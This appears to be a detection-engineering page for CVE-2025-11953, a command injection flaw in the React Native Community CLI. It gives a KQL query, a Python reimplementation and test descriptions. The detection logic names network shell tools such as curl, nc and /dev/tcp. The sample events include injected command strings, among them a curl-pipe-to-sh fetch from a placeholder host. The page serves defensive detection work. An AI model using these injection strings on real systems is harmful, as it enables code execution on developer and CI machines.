React Native Community CLI OS Command Injection (CVE-2025-11953)
Detects exploitation of CVE-2025-11953, an OS command injection vulnerability (CWE-78) in the React Native Community CLI. An attacker who can influence arguments or configuration consumed by the React Native CLI can inject arbitrary OS commands that execute with the privileges of the developer or CI/CD process invoking the CLI. This vulnerability is listed in the CISA Known Exploited Vulnerabilities catalog.
Vulnerability Intelligence
KEV — Known Exploited
Affected Software
- Vendor: React Native Community
- Product: CLI
Weakness (CWE)
- CWE-78 (OS Command Injection)
Timeline
- Disclosed: February 5, 2026
CVSS
What is React Native Community CLI OS Command Injection (CVE-2025-11953)?
React Native Community CLI OS Command Injection (CVE-2025-11953) maps to the Execution, Persistence and Lateral Movement tactics in MITRE ATT&CK: the adversary is trying to run malicious code.
This page provides production-ready detection logic for React Native Community CLI OS Command Injection (CVE-2025-11953), covering the data sources and telemetry it touches: Microsoft Defender for Endpoint, Microsoft Sentinel DeviceProcessEvents, Windows Security Event Log. The queries below are rated high severity at medium confidence, and ship for 7 SIEM platforms — KQL, SPL, Elastic, QRadar, Sumo, YARA-L, LogScale.
MITRE ATT&CK
- Tactic: Execution, Persistence, Lateral Movement
let RNCliIndicators = dynamic(['react-native', 'react_native_cli', '@react-native-community/cli', 'rn-cli']);
// Normalise both sources to the DeviceProcessEvents column names so the filters below see the same fields;
// without this, SecurityEvent rows carry no ProcessCommandLine and ParentCommandLine exists in neither table
union
    (DeviceProcessEvents
    | extend ParentProcessName = InitiatingProcessFileName, ParentCommandLine = InitiatingProcessCommandLine),
    (SecurityEvent
    | where EventID == 4688 // Windows process creation only
    | extend ProcessCommandLine = CommandLine, DeviceName = Computer, AccountName = Account, InitiatingProcessAccountName = SubjectUserName, FileName = Process)
| where TimeGenerated > ago(7d)
| where (ProcessCommandLine has_any (RNCliIndicators) or ParentProcessName has_any (RNCliIndicators))
| where ProcessCommandLine matches regex @'[;&|`$()].*[;&|`$()\/\\]'
    or ProcessCommandLine has_any ('curl ', 'wget ', 'bash -', 'sh -c', 'powershell', 'cmd /c', 'nc ', 'ncat ', '/dev/tcp')
| project TimeGenerated, DeviceName, AccountName, ProcessCommandLine, ParentProcessName, ParentCommandLine, InitiatingProcessAccountName, FileName
| extend SuspiciousIndicator = case(
    ProcessCommandLine has 'curl ' or ProcessCommandLine has 'wget ', 'RemoteDownload',
    ProcessCommandLine has 'bash -' or ProcessCommandLine has 'sh -c', 'ShellEscape',
    ProcessCommandLine has 'powershell', 'PowerShellExec',
    ProcessCommandLine has '/dev/tcp' or ProcessCommandLine has 'nc ', 'NetworkConnectivity',
    'CommandInjectionPattern'
)
| order by TimeGenerated desc
Detects processes spawned by or alongside the React Native Community CLI that exhibit OS command injection patterns, including shell escapes, remote download utilities, and reverse-shell indicators.
Data Sources
- Microsoft Defender for Endpoint
- Microsoft Sentinel DeviceProcessEvents
- Windows Security Event Log
Required Tables
- DeviceProcessEvents
- SecurityEvent
False Positives
- Legitimate React Native developers running shell scripts as part of standard build pipelines (e.g., fastlane, custom build hooks).
- CI/CD agents (GitHub Actions, Azure Pipelines) executing react-native CLI commands with complex argument strings that incidentally match injection patterns.
- Developer workstations running npm lifecycle scripts that invoke shell commands alongside react-native CLI.
- Monorepo tooling (nx, turborepo) invoking react-native CLI with chained commands.
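The KQL rule above, re-implemented in Python as an added example (not part of the original detection package) so its scoping, injection pattern and SuspiciousIndicator labelling can be run over constructed process-creation events: the first three mirror the expected signals of the tests on this page, the fourth is a routine react-native invocation, the fifth is the monorepo chained-command false positive listed above, and the last is shell activity with no React Native CLI context. Field names follow DeviceProcessEvents; hostnames and paths in the sample command lines are placeholders, and has_any approximates KQL term matching with case-insensitive substring matching.

```python
import re

# Indicator lists carried over from the KQL rule
RN_CLI_INDICATORS = ["react-native", "react_native_cli", "@react-native-community/cli", "rn-cli"]
SHELL_TOOL_TERMS = ["curl ", "wget ", "bash -", "sh -c", "powershell", "cmd /c", "nc ", "ncat ", "/dev/tcp"]
# Same regex as the rule: a shell metacharacter followed later by another one or a path separator
INJECTION_RE = re.compile(r"[;&|`$()].*[;&|`$()/\\]")
# Ordered like the rule's case(): the first matching label wins
INDICATOR_LABELS = [(["curl ", "wget "], "RemoteDownload"), (["bash -", "sh -c"], "ShellEscape"),
                    (["powershell"], "PowerShellExec"), (["/dev/tcp", "nc "], "NetworkConnectivity")]

def has_any(text, terms):
    """Approximates KQL has_any with case-insensitive substring matching."""
    lowered = text.lower()
    return any(term.lower() in lowered for term in terms)

def suspicious_indicator(cmd):
    """Label the command line the way the rule's case() expression does."""
    return next((label for terms, label in INDICATOR_LABELS if has_any(cmd, terms)), "CommandInjectionPattern")

def evaluate(event):
    """Return the SuspiciousIndicator label for one event, or None if the rule would not fire."""
    cmd = event.get("ProcessCommandLine", "")
    parent = event.get("ParentProcessName", "")
    if not (has_any(cmd, RN_CLI_INDICATORS) or has_any(parent, RN_CLI_INDICATORS)):
        return None  # scoped to React Native CLI activity only
    if not (INJECTION_RE.search(cmd) or has_any(cmd, SHELL_TOOL_TERMS)):
        return None
    return suspicious_indicator(cmd)

# Constructed sample events (not real telemetry); hostnames are placeholders
SAMPLE_EVENTS = [
    {"ParentProcessName": "node", "ProcessCommandLine":  # injected project-name argument
     'node /usr/lib/node_modules/@react-native-community/cli/build/bin.js init "demo; id > /tmp/cve_2025_11953_poc.txt"'},
    {"ParentProcessName": "node", "ProcessCommandLine":  # injected remote download
     'sh -c "react-native run-android && curl http://payload.example/p.sh | sh"'},
    {"ParentProcessName": "node.exe", "ProcessCommandLine":  # Windows PowerShell injection (no regex hit, term hit)
     'cmd /c "react-native run-windows & powershell -c whoami"'},
    {"ParentProcessName": "node", "ProcessCommandLine":  # benign: no metacharacters, no shell tools
     'npx react-native run-ios --simulator "iPhone 15"'},
    {"ParentProcessName": "node", "ProcessCommandLine":  # monorepo false positive: chained build via sh -c
     'sh -c "nx run mobile:build && react-native bundle --entry-file index.js --bundle-output ./build/main.jsbundle"'},
    {"ParentProcessName": "bash", "ProcessCommandLine":  # out of scope: no React Native CLI context
     'sh -c "curl http://example.org/x | bash -"'},
]

def run_detection(events):
    """Return (event index, SuspiciousIndicator) for every event the rule fires on."""
    return [(i, label) for i, e in enumerate(events) if (label := evaluate(e))]
```

Calling run_detection(SAMPLE_EVENTS) flags events 0, 1, 2 and 4; the monorepo build is labelled ShellEscape exactly as the rule would label it, which is why the tuning notes above matter.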
Sigma rule & cross-platform mapping
The detection logic for React Native Community CLI OS Command Injection (CVE-2025-11953) above is provided in a vendor-neutral form so you can deploy it on any SIEM. The same logic is shipped here as native KQL (Microsoft Sentinel / Defender), SPL (Splunk), EQL (Elastic Security), AQL (IBM QRadar), Sumo Logic CSE, YARA-L (Google Chronicle / SecOps) and CQL (CrowdStrike LogScale) queries. In Sigma terms, this detection targets the following logsource:
logsource:
category: process_creation
product: windows
Note that Tests 1 to 3 below exercise Linux hosts, which a windows logsource does not cover; map the same logic to a linux process_creation logsource as well if those hosts are in scope.
Testing Methodology
Validate this detection against 4 adversary techniques from Atomic Red Team. Each test below lists the behaviour to exercise and the telemetry you should expect to see. Executable commands and cleanup steps are available with Pro.
- Test 1: Command injection via React Native CLI project name argument
Expected signal: Process create event showing node spawning sh or bash with a command line containing the injected semicolon-delimited id command; file creation event for /tmp/cve_2025_11953_poc.txt.
- Test 2: Reverse shell injection via React Native CLI on Linux
Expected signal: Process create events for node → sh → id; file write to /tmp/rn_inject_test.txt containing the output of id.
- Test 3: Remote payload download via injected curl in React Native CLI build context
Expected signal: Process create event for node spawning sh, which spawns curl with an external URL argument; network connection event for curl to destination host.
- Test 4: Windows PowerShell injection via React Native CLI on Windows
Expected signal: Sysmon Event ID 1 showing node.exe spawning cmd.exe which spawns powershell.exe; file creation event in %TEMP% for rn_inject_test.txt.